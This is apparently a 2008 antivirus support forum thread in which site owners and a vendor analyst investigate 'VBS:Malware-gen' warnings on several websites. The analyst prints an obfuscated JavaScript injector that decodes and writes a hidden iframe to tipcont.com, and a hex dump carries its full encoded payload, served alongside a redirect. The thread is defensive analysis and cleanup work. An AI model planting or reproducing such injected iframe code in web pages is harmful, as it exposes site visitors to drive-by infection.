VBS:Malware-gen

[kubecj]

Somewhere along the downloading of the page, this gets downloaded:

<script language="JavaScript">e = '0x00' + '19';str1 = "%A2%FA%F1 ...snippage... %B7%FA%F1%EC%A4";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}document.write(str);</script>

It contains 'encrypted' hidden iframe leading to tipcont.com

[simple-it-solutions]

Thanks for that we will look into it straight away.

Regards

Graham.

[simple-it-solutions]

I don't FTP access to this server but this line of code looks wrong to me is any one else hear familiar with this being inserted into websites?

<script type='text/javascript' src='/e107_files/sleight_js.php'></script>

The .php part looks like it is to prevent downloading or viewing while it runs as a script?

Regards

Graham.

[Dig]

Hi,

http://www.littlemonkey.co.nz is my site.  I've double and triple checked the scripts running on the site, I've used FireBug to determine network activity when loading the page and can find no encrypted javascript or references to tipocnt.com.

I have scanned it with NOD32 (Virus Bulletins top rated antivirus software: http://www.eset.com/products/compare-NOD32-vs-competition.php) and the page is clean.

I have dealt with a cleaned up other sites in the past that have had similar exploits, so I do know what I'm looking for, and was convinced it was a false positive for avast (something that is not unheard of be any means) until kubecj and jsejtko have indicated otherwise.  I would really appreciate some further information, i.e. WHERE in the source is that javascript being downloaded and HOW did you determine that tipocnt.com.

This is important not just for casual visitors to my site, but for a specific prospect that uses Avast and needs to view my site.

Thanks

Nick

[simple-it-solutions]

I have seen Dr.web mentioned a few times, so I have just run a check using it on http://www.littlemonkey.co.nz and it comes up clean can we please get someone else to check and confirm that avast may be at fault here?

Regards

Graham

[kubecj]

http://www.littlemonkey.co.nz

In fact, this is a neat trick. The javascript is sent along with 302 (redirect) reply. Not sure what 'should' browsers do when the get both 302 and the content, but obviously, your server sends the 'ugly' stuff.

This is VirusTotal report regarding the code:
http://www.virustotal.com/cs/analisis/7312aedf9204d7300566560d4f681ee0

Code: [Select]

Hypertext Transfer Protocol
    HTTP/1.1 302 Found\r\n
        Response Code: 302
    Date: Thu, 21 Feb 2008 21:23:34 GMT\r\n
    Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8e mod_perl/2.0.2 Perl/v5.8.8\r\n
    X-Powered-By: PHP/5.2.0-8+etch9\r\n
    Location: news.php\r\n
    Connection: close\r\n
    Transfer-Encoding: chunked\r\n
    Content-Type: text/html\r\n
    \r\n
    Data (545 bytes)

0000  00 11 2f 0e db b3 00 0b 6b 4d 0a 8c 08 00 45 00   ../.....kM....E.
0010  03 58 22 52 40 00 28 06 e1 c4 d2 37 69 52 0a fe   .X"R@.(....7iR..
0020  05 02 00 50 05 22 f3 26 15 f1 e0 0f 4d cc 50 18   ...P.".&....M.P.
0030  19 20 42 18 00 00 48 54 54 50 2f 31 2e 31 20 33   . B...HTTP/1.1 3
0040  30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20   02 Found..Date:
0050  54 68 75 2c 20 32 31 20 46 65 62 20 32 30 30 38   Thu, 21 Feb 2008
0060  20 32 31 3a 32 33 3a 33 34 20 47 4d 54 0d 0a 53    21:23:34 GMT..S
0070  65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e   erver: Apache/2.
0080  32 2e 33 20 28 44 65 62 69 61 6e 29 20 6d 6f 64   2.3 (Debian) mod
0090  5f 73 73 6c 2f 32 2e 32 2e 33 20 4f 70 65 6e 53   _ssl/2.2.3 OpenS
00a0  53 4c 2f 30 2e 39 2e 38 65 20 6d 6f 64 5f 70 65   SL/0.9.8e mod_pe
00b0  72 6c 2f 32 2e 30 2e 32 20 50 65 72 6c 2f 76 35   rl/2.0.2 Perl/v5
00c0  2e 38 2e 38 0d 0a 58 2d 50 6f 77 65 72 65 64 2d   .8.8..X-Powered-
00d0  42 79 3a 20 50 48 50 2f 35 2e 32 2e 30 2d 38 2b   By: PHP/5.2.0-8+
00e0  65 74 63 68 39 0d 0a 4c 6f 63 61 74 69 6f 6e 3a   etch9..Location:
00f0  20 6e 65 77 73 2e 70 68 70 0d 0a 43 6f 6e 6e 65    news.php..Conne
0100  63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72   ction: close..Tr
0110  61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a   ansfer-Encoding:
0120  20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e    chunked..Conten
0130  74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d   t-Type: text/htm
0140  6c 0d 0a 0d 0a 32 31 35 0d 0a 0a 3c 73 63 72 69   l....215...<scri
0150  70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76   pt language="Jav
0160  61 53 63 72 69 70 74 22 3e 65 20 3d 20 27 30 78   aScript">e = '0x
0170  30 30 27 20 2b 20 27 31 39 27 3b 73 74 72 31 20   00' + '19';str1
0180  3d 20 22 25 41 32 25 46 41 25 46 31 25 45 43 25   = "%A2%FA%F1%EC%
0190  38 36 25 45 42 25 45 41 25 45 31 25 46 32 25 46   86%EB%EA%E1%F2%F
01a0  44 25 41 35 25 42 38 25 45 43 25 46 31 25 45 42   D%A5%B8%EC%F1%EB
01b0  25 46 31 25 46 38 25 46 31 25 46 32 25 46 31 25   %F1%F8%F1%F2%F1%
01c0  45 41 25 45 31 25 41 30 25 46 45 25 46 31 25 46   EA%E1%A0%FE%F1%F
01d0  41 25 46 41 25 46 44 25 46 34 25 42 38 25 41 34   A%FA%FD%F4%B8%A4
01e0  25 41 32 25 46 31 25 46 43 25 45 38 25 46 39 25   %A2%F1%FC%E8%F9%
01f0  46 35 25 46 44 25 38 36 25 45 42 25 45 38 25 46   F5%FD%86%EB%E8%F
0200  42 25 41 35 25 42 38 25 46 45 25 45 41 25 45 41   B%A5%B8%FE%EA%EA
0210  25 46 36 25 41 30 25 42 37 25 42 37 25 45 41 25   %F6%A0%B7%B7%EA%
0220  46 31 25 46 36 25 46 37 25 46 42 25 46 34 25 45   F1%F6%F7%FB%F4%E
0230  41 25 42 34 25 46 42 25 46 37 25 46 35 25 42 37   A%B4%FB%F7%F5%B7
0240  25 46 32 25 46 41 25 42 37 25 46 35 25 46 44 25   %F2%FA%B7%F5%FD%
0250  46 34 25 45 41 25 42 37 25 42 38 25 38 36 25 45   F4%EA%B7%B8%86%E
0260  46 25 46 31 25 46 41 25 45 41 25 46 45 25 41 35   F%F1%FA%EA%FE%A5
0270  25 41 39 25 38 36 25 46 45 25 46 44 25 46 31 25   %A9%86%FE%FD%F1%
0280  46 46 25 46 45 25 45 41 25 41 35 25 41 39 25 41   FF%FE%EA%A5%A9%A
0290  34 25 41 32 25 42 37 25 46 31 25 46 43 25 45 38   4%A2%B7%F1%FC%E8
02a0  25 46 39 25 46 35 25 46 44 25 41 34 25 41 32 25   %F9%F5%FD%A4%A2%
02b0  42 37 25 46 41 25 46 31 25 45 43 25 41 34 22 3b   B7%FA%F1%EC%A4";
02c0  73 74 72 3d 74 6d 70 3d 27 27 3b 66 6f 72 28 69   str=tmp='';for(i
02d0  3d 30 3b 69 3c 73 74 72 31 2e 6c 65 6e 67 74 68   =0;i<str1.length
02e0  3b 69 2b 3d 33 29 7b 74 6d 70 20 3d 20 75 6e 65   ;i+=3){tmp = une
02f0  73 63 61 70 65 28 73 74 72 31 2e 73 6c 69 63 65   scape(str1.slice
0300  28 69 2c 69 2b 33 29 29 3b 73 74 72 3d 73 74 72   (i,i+3));str=str
0310  2b 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72   +String.fromChar
0320  43 6f 64 65 28 28 74 6d 70 2e 63 68 61 72 43 6f   Code((tmp.charCo
0330  64 65 41 74 28 30 29 5e 65 29 2d 31 32 37 29 3b   deAt(0)^e)-127);
0340  7d 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28   }document.write(
0350  73 74 72 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d   str);</script>..
0360  0a 30 0d 0a 0d 0a                                 .0....



[Dig]

Neat trick huh?

Ok, I've removed that malicious code and notified my host to check security at their end.  Could you confirm that the site is now clean please?

I assume that all other virus scans were showing clean as the code is never executed (at least not by firefox) due to the redirect header?  How much of a risk is this type of exploit if browsers ignore the content?

Cheers,
Nick

[kubecj]

Depends on the point of view.

From the user's view - if the browser won't execute (I don't know and I can't google anything reasonable), nothing happens, just the code is stored in user's cache.

From the webmaster's view - something is very wrong regarding the security and this may be just one of the 'bad things' sitting quietly on the server.


Right now avast! does not report anything on load. NOD32 and Dr.Web did not report anything just because they won't catch it at all. See the VirusTotal report - both consider the piece as 'ok'.

[MrChuck]

I am seeing VBS Malware-gen warnings against the site www.australianolives.com.au. Is it possible to work out whether this is a false positive or an actual malware? The webmaster believes her site is OK; we are using Avast Enterprise with the latest updates (but I've seen the same warning at home with the free edition), and I see from the discussion above that some of these are false positives and some are not. Our local machines are not infected according to avast.

This issue seems pretty tricky!

MrChuck

[kubecj]

It does reference encrypted hidden iframe pointing to stat-google.com. We definitely don't like that 

[DavidR]

The stat-google.com is registered to google inc. perhaps something similar to the google-analytics.com ?

[blackcat2]

I just started noticing incessant warnings for this after the update on several scripts I have on my computer for my websites.
I know there is no malware on them at all so what in the code could possibly be triggering all these warnings?

One of the scripts is something I put together to allow editing of a website template online by the person who downloaded it. It is quite simple really. Nothing malware about it.

It uses javascript and a form combined with a variable(section) to be replaced when the user presses submit. Could it be something in the javascript that is triggering this?

Heidi

[kubecj]

May be. The best you can do is to send us the samples to virus@avast.com, stating that it's a false alarm and also by which VPS version you got which detection.

[MrChuck]

OK, I'm not much the wiser. Is encrypting a hidden iframe something google is likely to do? If so, why are they using hacker technology for 'legitimate' statistics collection?

So the question still is: should avast be reporting this as a threat or not, and what do I tell the australian olives webmaster?

MrChuck

[kubecj]

Does she know there is such stuff on her site?
Is stat-google.com really 'legitimate' google site used for tracking purposes? (I don't question the ownership, but that may be bought later)
Why is this stuff hidden is special file, does document.write and is obfuscated?

To me it definitely looks fishy.